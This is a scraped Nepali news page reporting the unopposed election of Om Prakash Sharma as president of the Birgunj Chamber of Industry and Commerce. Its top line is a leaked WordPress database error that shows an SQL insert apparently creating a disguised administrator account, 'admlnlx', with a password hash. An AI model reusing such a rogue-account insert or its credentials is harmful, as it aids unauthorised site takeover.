WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bgf7u2t8su2NXK79XCM1x2OlRnslVv1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 19:42:22', '', 'admlnlx', 'admlnlx')
सुरेश बिडारी,
वीरगञ्ज माघ ३-
वीरगञ्ज उद्योग वाणिज्य संघको अध्यक्षमा ओम प्रकाश शर्मा निर्विरोध निर्वाचित भएका छन् ।
त्यस्तै प्रथम उपाध्यक्ष गोपाल केडिया, द्वितीय उपाध्यक्ष सुवोध कुमार गुप्ता, महासचिव सुनिल कुमार खेतान, उद्योग सचिव मनोज कुमार दास, वाणिज्य सचिव माधव राजपाल, उद्योग सह–सचिव हरि प्रसाद गौतम, वाणिज्य सह–सचिव पे्रमचन्द्र गोयल, कोषाध्यक्ष रविन्द्र कुमार वर्णवाल र सह–कोषाध्यक्ष अरविन्द्र अमात्य निर्वाचित भएका छन् ।
४१ औं साधारणसभाबाट ३५ जना सदस्य चयन भएका छन् ।